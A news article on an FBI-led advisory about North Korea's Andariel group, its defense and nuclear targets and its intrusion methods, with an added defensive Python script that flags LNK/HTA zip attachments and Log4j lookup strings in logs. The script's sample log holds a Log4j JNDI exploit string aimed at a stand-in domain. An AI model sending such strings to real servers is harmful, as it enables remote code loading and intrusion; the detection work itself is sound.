
    Cyber warfare: North Korean hackers target global defense for nuclear gains

    By Kapil Kajal

    14 hours ago


    The US Federal Bureau of Investigation (FBI), in collaboration with South Korea and the UK, has issued a cybersecurity advisory to raise awareness about cyber espionage activities linked to the Reconnaissance General Bureau (RGB) 3rd Bureau of the Democratic People’s Republic of Korea (DPRK).

    The RGB 3rd Bureau, which is located in Pyongyang and Sinuiju, includes a DPRK state-sponsored cyber group publicly known as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa.

    According to the FBI, the group primarily targets defense, aerospace, nuclear, and engineering entities worldwide to obtain sensitive and classified technical information and intellectual property to advance the DPRK’s military and nuclear programs and ambitions.

    The FBI stated that the group and its cyber techniques continue to pose a threat to various industry sectors worldwide, including entities in the authoring agencies' own countries (the US, South Korea, and the UK) as well as in Japan and India.

    RGB’s 3rd Bureau actors finance their espionage activities by carrying out ransomware operations against US healthcare organizations.

    Initial access

    The actors gain initial access by exploiting web servers through known software vulnerabilities, such as Log4j, to deploy a web shell and reach sensitive information and applications for further exploitation.

    The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and escalate privileges using common credential-stealing tools such as Mimikatz.

    They deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration. They also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut (LNK) files or HTML Application (HTA) script files, delivered inside encrypted or unencrypted zip archives.

    The FBI encouraged critical infrastructure organizations to promptly apply vulnerability patches, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections.
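Two of the behaviors described above are cheap to look for on the defender's side: a zip attachment that carries an LNK or HTA file, and a web request containing a Log4j lookup string. The script below is an added illustration, not code from the advisory or from the FBI. It builds a constructed in-memory zip and a few constructed access-log lines, then applies the two checks; the member names of a zip live in its central directory, so the attachment check also works on password-protected archives without the password.

```python
import io
import re
import zipfile

# Attachment types the advisory names as phishing lures (Windows Shortcut, HTML Application).
RISKY_EXTENSIONS = {".lnk", ".hta"}

# Case-insensitive match for a Log4j lookup string anywhere in a logged request field
# (e.g. in the User-Agent), the typical footprint of a Log4j exploitation attempt.
JNDI_LOOKUP = re.compile(r"\$\{[^}]*jndi", re.IGNORECASE)


def risky_members(zip_bytes: bytes) -> list[str]:
    """Return the names of archive members that have a risky extension.

    Only the central directory is read, which zip encryption leaves in the clear,
    so this check does not need the archive password.
    """
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.lower()
            if any(name.endswith(ext) for ext in RISKY_EXTENSIONS):
                flagged.append(info.filename)
    return flagged


def suspicious_requests(log_lines: list[str]) -> list[str]:
    """Return the access-log lines that contain a JNDI lookup string."""
    return [line for line in log_lines if JNDI_LOOKUP.search(line)]


def build_sample_zip() -> bytes:
    """Constructed sample attachment: a harmless text file plus a double-extension LNK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "sample text\n")
        zf.writestr("invoice.pdf.lnk", "placeholder shortcut content")
    return buf.getvalue()


# Constructed sample access-log lines (Apache combined format); one carries a lookup string
# in the User-Agent field, pointing at an RFC 2606 reserved domain.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "POST /api HTTP/1.1" 200 12 "-" "curl/8.0"',
]


if __name__ == "__main__":
    print("risky attachment members:", risky_members(build_sample_zip()))
    for line in suspicious_requests(SAMPLE_LOG):
        print("suspicious request:", line)
```

In practice both functions would be fed from a mail gateway hook and a log shipper respectively; the regex is deliberately loose (it tolerates text between `${` and `jndi`) so that a match is a trigger for review, not a verdict.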

    “While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations,” the FBI said.

    Cyber espionage

    The actors are currently targeting sensitive military information and intellectual property of defense, aerospace, nuclear, and engineering organizations. They also focus on the medical and energy industries to a lesser extent.

    In the field of defense, the actors are seeking information on heavy and light tanks, self-propelled howitzers, light strike vehicles, ammunition supply vehicles, littoral combat ships, combatant craft, submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs).

    Critical information regarding fighter aircraft, unmanned aerial vehicles (UAVs), missiles, missile defense systems, satellites, satellite communications, nano-satellite technology, surveillance radar, phased-array radar, and other radar systems is at risk in the aerospace industry.

    The actors attempted to obtain nuclear information, such as details on uranium processing and enrichment, waste and storage of materials, nuclear power plants, government nuclear facilities, and research institutes.

    Furthermore, the risk extends to shipbuilding, marine engineering, robot machinery, additive manufacturing, 3D printing, casting, fabrication, high-heat metal molding, rubber and plastic molding, machining processes, and technology.

    The targeted information includes contract specifications, bills of materials, project details, design drawings, and engineering documents. This information has both military and civilian applications, which leads the authoring agencies to assess that one of the group’s main responsibilities is meeting the collection requirements of Pyongyang’s nuclear and defense programs.

    The FBI suggested implementing security measures based on the threat actors’ observed activity to enhance an organization’s cybersecurity.
